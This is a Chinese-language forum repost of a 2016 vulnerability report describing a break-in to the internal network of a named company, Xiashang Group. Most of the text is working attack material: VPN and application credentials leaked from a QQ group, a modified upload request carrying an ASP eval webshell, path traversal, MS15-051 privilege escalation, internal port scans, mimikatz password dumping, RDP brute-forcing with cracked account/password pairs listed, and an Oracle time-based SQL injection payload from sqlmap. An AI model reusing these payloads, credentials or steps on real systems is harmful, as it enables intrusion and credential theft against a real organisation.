HanDs
NO.2

[7月漏洞公开] 信息挖掘之GetShell夏商集团内网服务器&夏商集团内网探测(QQ群渗透案例) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

。。。。。

详细说明:

今天通过QQ群搜索引擎,看到了一个这样的群。

QQ截图20160501104108.png



水产物产管理软件小组 271170721

https://59.61.80.154:10443/sslvpn/portal.html  账号:user, 密码:seashinegroup

(软件)http://10.0.0.157:7000/Login.aspx  账号:xs,密码:123

泄漏了VPN地址和帐号密码。

和内网的帐号密码。

先连上VPN。

QQ截图20160501112017.png



QQ截图20160501112211.png



然后打开那个内网地址,登录。

QQ截图20160501112111.png



QQ截图20160501112035.png



找到一处后台上传。

QQ截图20160501112133.png





POST /Modules/Controllers/Receivefile.aspx HTTP/1.1

Host: 10.0.0.157:7000

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Referer: http://10.0.0.157:7000/Modules/RentalDeleteApp/CustmerDeleteEdit.aspx?act=add&murl=~/MODULES/RENTALDELETEAPP/CUSTMERDELETEMANAGE.ASPX&__r=0.49503681277472933

Cookie: ASP.NET_SessionId=32cygirraxlxni4p53fa0cby

Connection: keep-alive



-----------------------------169631145724068

Content-Disposition: form-data; name="fileToUpload"; filename="cmd.jpg"

Content-Type: image/jpeg



<%eval request("1281441136")%>

-----------------------------169631145724068--



要改包上传。



上传了asp之后可是不知道地址在那?

最后看到一个下载的按钮。

审查元素。

http://10.0.0.157:7000/Modules/Introduce/DownLoad.aspx?fname=/Uploads/16-04-01/20160401204804540.asp

得到一个这样的URL。

猜一下得到完整shell地址。

同时该URL还存在文件包含。

http://10.0.0.157:7000/Modules/Introduce/DownLoad.aspx?fname=../../../../../zcgl_xs.rar

http://10.0.0.157:7000//Uploads/16-04-01/20160401204804540.asp

QQ截图20160501111925.png





D:\App\WebSite\Uploads\16-04-01\> netstat -an



活动连接



  协议  本地地址          外部地址        状态

  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING

  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING

  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING

  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING

  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING

  TCP    0.0.0.0:7000           0.0.0.0:0              LISTENING

  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING

  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING

  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING

  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING

  TCP    0.0.0.0:49155          0.0.0.0:0              LISTENING

  TCP    0.0.0.0:49156          0.0.0.0:0              LISTENING

  TCP    0.0.0.0:49157          0.0.0.0:0              LISTENING

  TCP    10.0.0.157:139         0.0.0.0:0              LISTENING

  TCP    10.0.0.157:7000        192.168.100.15:8080    TIME_WAIT

  TCP    10.0.0.157:7000        192.168.100.15:8081    TIME_WAIT

  TCP    10.0.0.157:7000        192.168.100.15:8088    TIME_WAIT

  TCP    10.0.0.157:7000        192.168.100.15:20349   TIME_WAIT

  TCP    10.0.0.157:7000        192.168.100.15:20354   ESTABLISHED

  TCP    127.0.0.1:1434         0.0.0.0:0              LISTENING

  TCP    [::]:80                [::]:0                 LISTENING

  TCP    [::]:135               [::]:0                 LISTENING

  TCP    [::]:445               [::]:0                 LISTENING

  TCP    [::]:1433              [::]:0                 LISTENING

  TCP    [::]:3389              [::]:0                 LISTENING

  TCP    [::]:7000              [::]:0                 LISTENING

  TCP    [::]:47001             [::]:0                 LISTENING

  TCP    [::]:49152             [::]:0                 LISTENING

  TCP    [::]:49153             [::]:0                 LISTENING

  TCP    [::]:49154             [::]:0                 LISTENING

  TCP    [::]:49155             [::]:0                 LISTENING

  TCP    [::]:49156             [::]:0                 LISTENING

  TCP    [::]:49157             [::]:0                 LISTENING

  TCP    [::1]:1434             [::]:0                 LISTENING

  UDP    0.0.0.0:123            *:*                    

  UDP    0.0.0.0:500            *:*                    

  UDP    0.0.0.0:4500           *:*                    

  UDP    0.0.0.0:5355           *:*                    

  UDP    10.0.0.157:137         *:*                    

  UDP    10.0.0.157:138         *:*                    

  UDP    [::]:123               *:*                    

  UDP    [::]:500               *:*                    

  UDP    [::]:4500              *:*                    

  UDP    [::]:5355              *:*                    

  UDP    [fe80::78ed:945a:aa9a:c143%11]:546  *:*                    



开放了3389.



D:\App\WebSite\Uploads\16-04-01\> whoami

iis apppool\zcgl



低权限。

D:\App\WebSite\Uploads\16-04-01\> net user



\\ 的用户帐户



-------------------------------------------------------------------------------

Administrator            Guest                    

命令运行完毕,但发生一个或多个错误。







D:\App\WebSite\Uploads\16-04-01\> systeminfo



主机名:           WIN-BM2MUPRKFU1

OS 名称:          Microsoft Windows Server 2008 R2 Enterprise 

OS 版本:          6.1.7600 暂缺 Build 7600

OS 制造商:        Microsoft Corporation

OS 配置:          独立服务器

OS 构件类型:      Multiprocessor Free

注册的所有人:     Windows 用户

注册的组织:       

产品 ID:          00486-OEM-8400691-20006

初始安装日期:     2016/3/1, 2:38:18

系统启动时间:     2016/3/26, 3:15:27

系统制造商:       VMware, Inc.

系统型号:         VMware Virtual Platform

系统类型:         x64-based PC

处理器:           安装了 2 个处理器。

                  [01]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~2666 Mhz

                  [02]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~2666 Mhz

BIOS 版本:        Phoenix Technologies LTD 6.00, 2012/6/22

Windows 目录:     C:\Windows

系统目录:         C:\Windows\system32

启动设备:         \Device\HarddiskVolume1

系统区域设置:     zh-cn;中文(中国)

输入法区域设置:   zh-cn;中文(中国)

时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐

物理内存总量:     4,095 MB

可用的物理内存:   3,096 MB

虚拟内存: 最大值: 8,189 MB

虚拟内存: 可用:   7,028 MB

虚拟内存: 使用中: 1,161 MB

页面文件位置:     C:\pagefile.sys

域:               WORKGROUP

登录服务器:       暂缺

修补程序:         安装了 138 个修补程序。

                  [01]: KB981391

                  [02]: KB981392

                  [03]: KB977236

                  [04]: KB981111

                  [05]: KB977238

                  [06]: KB977239

                  [07]: KB981390

                  [08]: KB2032276

                  [09]: KB2124261

                  [10]: KB2271195

                  [11]: KB2296011

                  [12]: KB2305420

                  [13]: KB2345886

                  [14]: KB2347290

                  [15]: KB2386667

                  [16]: KB2387149

                  [17]: KB2393802

                  [18]: KB2419640

                  [19]: KB2423089

                  [20]: KB2425227

                  [21]: KB2442962

                  [22]: KB2454826

                  [23]: KB2467023

                  [24]: KB2483614

                  [25]: KB2484033

                  [26]: KB2488113

                  [27]: KB2505438

                  [28]: KB2506014

                  [29]: KB2506212

                  [30]: KB2506928

                  [31]: KB2509553

                  [32]: KB2511250

                  [33]: KB2511455

                  [34]: KB2522422

                  [35]: KB2529073

                  [36]: KB2533552

                  [37]: KB2535512

                  [38]: KB2536275

                  [39]: KB2536276

                  [40]: KB2541014

                  [41]: KB2544893

                  [42]: KB2545698

                  [43]: KB2547666

                  [44]: KB2552343

                  [45]: KB2560656

                  [46]: KB2563227

                  [47]: KB2564958

                  [48]: KB2570947

                  [49]: KB2584146

                  [50]: KB2585542

                  [51]: KB2598845

                  [52]: KB2603229

                  [53]: KB2604114

                  [54]: KB2607047

                  [55]: KB2608658

                  [56]: KB2618451

                  [57]: KB2620704

                  [58]: KB2621440

                  [59]: KB2631813

                  [60]: KB2640148

                  [61]: KB2643719

                  [62]: KB2644615

                  [63]: KB2645640

                  [64]: KB2653956

                  [65]: KB2654428

                  [66]: KB2655992

                  [67]: KB2656355

                  [68]: KB2656410

                  [69]: KB2658846

                  [70]: KB2659262

                  [71]: KB2660075

                  [72]: KB2661254

                  [73]: KB2667402

                  [74]: KB2676562

                  [75]: KB2685811

                  [76]: KB2685813

                  [77]: KB2685939

                  [78]: KB2690533

                  [79]: KB2691442

                  [80]: KB2698365

                  [81]: KB2699779

                  [82]: KB2705219

                  [83]: KB2706045

                  [84]: KB2709630

                  [85]: KB2712808

                  [86]: KB2718704

                  [87]: KB2719033

                  [88]: KB2726535

                  [89]: KB2729094

                  [90]: KB2729451

                  [91]: KB2736418

                  [92]: KB2741355

                  [93]: KB2742598

                  [94]: KB2743555

                  [95]: KB2748349

                  [96]: KB2749655

                  [97]: KB2753842

                  [98]: KB2756920

                  [99]: KB2757638

                  [100]: KB2758857

                  [101]: KB2761217

                  [102]: KB2765809

                  [103]: KB2769369

                  [104]: KB2770660

                  [105]: KB2779562

                  [106]: KB2785220

                  [107]: KB2786400

                  [108]: KB2789644

                  [109]: KB2790113

                  [110]: KB2790655

                  [111]: KB2791765

                  [112]: KB2807986

                  [113]: KB2813170

                  [114]: KB2813347

                  [115]: KB2840149

                  [116]: KB2998812

                  [117]: KB958488

                  [118]: KB972270

                  [119]: KB974431

                  [120]: KB974571

                  [121]: KB975467

                  [122]: KB975560

                  [123]: KB977074

                  [124]: KB978542

                  [125]: KB978601

                  [126]: KB979099

                  [127]: KB979309

                  [128]: KB979482

                  [129]: KB979538

                  [130]: KB979687

                  [131]: KB979688

                  [132]: KB979900

                  [133]: KB980408

                  [134]: KB980846

                  [135]: KB982018

                  [136]: KB982132

                  [137]: KB982666

                  [138]: KB982799

网卡:             安装了 1 个 NIC。

                  [01]: Intel(R) PRO/1000 MT Network Connection

                      连接名:      本地连接

                      启用 DHCP:   否

                      IP 地址

                        [01]: 10.0.0.157

                        [02]: fe80::78ed:945a:aa9a:c143





使用

MS15-051  Exploit 提权。

下载地址http://www.tuicool.com/articles/7fUZFnU

7.png



8.png



漏洞证明:

扫描内网得到:

10.0.0.30: 139

10.0.0.30: 445

10.0.0.30: 3389

10.0.0.60: 139

10.0.0.60: 445

10.0.0.80: 139

10.0.0.80: 445

10.0.0.80: 3389

10.0.0.81: 80

10.0.0.81: 139

10.0.0.81: 445

10.0.0.81: 3389

10.0.0.82: 139

10.0.0.82: 445

10.0.0.82: 3389

10.0.0.90: 139

10.0.0.90: 443

10.0.0.90: 445

10.0.0.90: 3389

10.0.0.110: 80

10.0.0.110: 139

10.0.0.110: 445

10.0.0.110: 3389

10.0.0.123: 139

10.0.0.123: 445

10.0.0.123: 3389

10.0.0.126: 80

10.0.0.126: 139

10.0.0.126: 445

10.0.0.126: 3389

10.0.0.127: 139

10.0.0.127: 445

10.0.0.127: 3389

10.0.0.128: 139

10.0.0.128: 445

10.0.0.128: 3389

10.0.0.130: 80

10.0.0.130: 139

10.0.0.130: 445

10.0.0.130: 3389

10.0.0.133: 80

10.0.0.133: 139

10.0.0.133: 445

10.0.0.133: 3389

10.0.0.134: 80

10.0.0.134: 139

10.0.0.134: 445

10.0.0.134: 3389

10.0.0.135: 80

10.0.0.136: 80

10.0.0.137: 80

10.0.0.137: 443

10.0.0.138: 80

10.0.0.138: 443

10.0.0.139: 139

10.0.0.139: 445

10.0.0.139: 3389

10.0.0.140: 80

10.0.0.140: 443

10.0.0.143: 80

10.0.0.143: 443

10.0.0.144: 139

10.0.0.144: 445

10.0.0.145: 445

10.0.0.145: 3389

10.0.0.150: 80

10.0.0.150: 139

10.0.0.150: 443

10.0.0.150: 445

10.0.0.150: 3389

10.0.0.151: 139

10.0.0.151: 3389

10.0.0.151: 445

10.0.0.152: 139

10.0.0.152: 445

10.0.0.152: 3389

10.0.0.153: 80

10.0.0.153: 139

10.0.0.153: 445

10.0.0.153: 3389

10.0.0.155: 139

10.0.0.155: 445

10.0.0.155: 3389

10.0.0.156: 80

10.0.0.156: 139

10.0.0.156: 445

10.0.0.156: 3389

10.0.0.157: 80

10.0.0.157: 139

10.0.0.157: 445

10.0.0.157: 3389

10.0.0.158: 139

10.0.0.158: 445

10.0.0.158: 3389

10.0.0.159: 139

10.0.0.159: 445

10.0.0.159: 3389

10.0.0.160: 80

10.0.0.160: 139

10.0.0.160: 445

10.0.0.160: 3389

10.0.0.161: 139

10.0.0.161: 3389

10.0.0.161: 445

10.0.0.162: 139

10.0.0.162: 445

10.0.0.162: 3389

10.0.0.163: 80

10.0.0.163: 139

10.0.0.163: 443

10.0.0.163: 445

10.0.0.163: 3389

10.0.0.164: 139

10.0.0.164: 443

10.0.0.164: 445

10.0.0.164: 3389

10.0.0.165: 80

10.0.0.165: 139

10.0.0.165: 443

10.0.0.165: 445

10.0.0.165: 3389

10.0.0.167: 80

10.0.0.167: 139

10.0.0.167: 445

10.0.0.167: 443

10.0.0.167: 3389

10.0.0.240: 80

10.0.0.240: 139

10.0.0.240: 3389

10.0.0.240: 445

10.0.0.241: 80

10.0.0.241: 443

10.0.0.242: 80

10.0.0.242: 443

10.0.0.243: 443

10.0.0.244: 80

10.0.0.244: 139

10.0.0.244: 445

10.0.0.244: 3389

10.0.0.245: 443

10.0.0.246: 80

10.0.0.247: 80

10.0.0.247: 443

10.0.0.250: 445

10.0.0.250: 3389

开始漫游内网系统。

1.png



2.png



3.png



4.png



5.png



6.png



使用法国神器mimikatz抓到密码。

9.png





根据抓到的密码写出密码规则进行DUBrute爆破3389。



结果:

[email protected];Xsjt2016

[email protected];Xsjt2015

[email protected];Xsjt2016

[email protected];123456

[email protected];123456

[email protected];123456

[email protected];123456

[email protected];123456

[email protected];Xsjt2014

[email protected];Xsjt2014

[email protected];Xsjt2014

[email protected];Xsjt2014





还有处注入。





http://10.0.0.126/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute





TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=123*









C:\Users\Administrator>sqlmap.py -u "http://10.0.0.126/service/~iufo/com.ufida.w

eb.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=leve

l_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.U

nitTableRefAction&method=execute" --data="TreeSelectedID=&TableSelectedID=&refSe

archProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSear

chOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=123*"

_

___ ___| |_____ ___ ___ {1.0.0.12#dev}

|_ -| . | | | .'| . |

|___|_ |_|_|_|_|__,| _|

|_| |_| http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual

consent is illegal. It is the end user's responsibility to obey all applicable

local, state and federal laws. Developers assume no liability and are not respon

sible for any misuse or damage caused by this program



[*] starting at 10:47:35



custom injection marking character ('*') found in option '--data'. Do you want t

o process it? [Y/n/q] Y

[10:47:37] [INFO] testing connection to the target URL

[10:47:37] [INFO] heuristics detected web page charset 'ISO-8859-2'

[10:47:37] [INFO] checking if the target is protected by some kind of WAF/IPS/ID

S

[10:47:38] [INFO] testing if the target URL is stable

[10:47:38] [WARNING] target URL is not stable. sqlmap will base the page compari

son on a sequence matcher. If no dynamic nor injectable parameters are detected,

or in case of junk results, refer to user's manual paragraph 'Page comparison'

and provide a string or regular expression to match on

how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C

[10:47:40] [INFO] testing if (custom) POST parameter '#1*' is dynamic

[10:47:40] [WARNING] (custom) POST parameter '#1*' does not appear dynamic

[10:47:40] [INFO] heuristics detected web page charset 'utf-8'

[10:47:40] [WARNING] heuristic (basic) test shows that (custom) POST parameter '

#1*' might not be injectable

[10:47:41] [INFO] testing for SQL injection on (custom) POST parameter '#1*'

[10:47:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[10:47:41] [WARNING] reflective value(s) found and filtering out

[10:47:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'



[10:47:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B

Y or GROUP BY clause'

[10:47:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[10:47:53] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o

r HAVING clause'

[10:47:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT

ype)'

[10:47:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'

[10:47:57] [INFO] testing 'MySQL inline queries'

[10:47:58] [INFO] testing 'PostgreSQL inline queries'

[10:47:58] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'

[10:47:59] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'

[10:48:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'

[10:48:02] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)

'

[10:48:04] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - c

omment)'

[10:48:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'

[10:48:08] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[10:48:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[10:48:12] [INFO] testing 'Oracle AND time-based blind'

[10:48:24] [INFO] (custom) POST parameter '#1*' seems to be 'Oracle AND time-bas

ed blind' injectable

it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads s

pecific for other DBMSes? [Y/n] Y

for the remaining tests, do you want to include all tests for 'Oracle' extending

provided level (1) and risk (1) values? [Y/n] Y

[10:53:34] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

[10:53:34] [INFO] automatically extending ranges for UNION query injection techn

ique tests as there is at least one other (potential) technique found

[10:53:34] [CRITICAL] connection dropped or unknown HTTP status code received. T

ry to force the HTTP User-Agent header with option '--user-agent' or switch '--r

andom-agent'. sqlmap is going to retry the request(s)

[10:53:34] [WARNING] most probably web server instance hasn't recovered yet from

previous timed based payload. If the problem persists please wait for few minut

es and rerun without flag T in option '--technique' (e.g. '--flush-session --tec

hnique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec

=2')

[10:53:42] [INFO] checking if the injection point on (custom) POST parameter '#1

*' is a false positive

(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the oth

ers (if any)? [y/N] n

sqlmap identified the following injection point(s) with a total of 121 HTTP(s) r

equests:

---

Parameter: #1* ((custom) POST)

Type: AND/OR time-based blind

Title: Oracle AND time-based blind

Payload: TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchP

ropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper==&refSearchOperLbl=%E7

%AD%89%E4%BA%8E&refSearchValue=123' AND 3307=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)|

|CHR(67)||CHR(68)||CHR(90),5) AND 'YHld'='YHld

---

[11:16:32] [INFO] the back-end DBMS is Oracle

web application technology: JSP

back-end DBMS: Oracle

[11:16:32] [INFO] fetched data logged to text files under 'C:\Users\Administrato

r\.sqlmap\output\10.0.0.126'





至此,我们已经控制了内网十二台VM的虚拟主机。





信息泄漏啥的就不说了,内网的系统数据一般很丰富。

修复方案:

严格控制入口。


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
信息 挖掘 G et Sh el l 夏商 集团 服务器 & am p ; am p ; 夏商 集团 探测 ( Q Q 渗透 案例 )
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组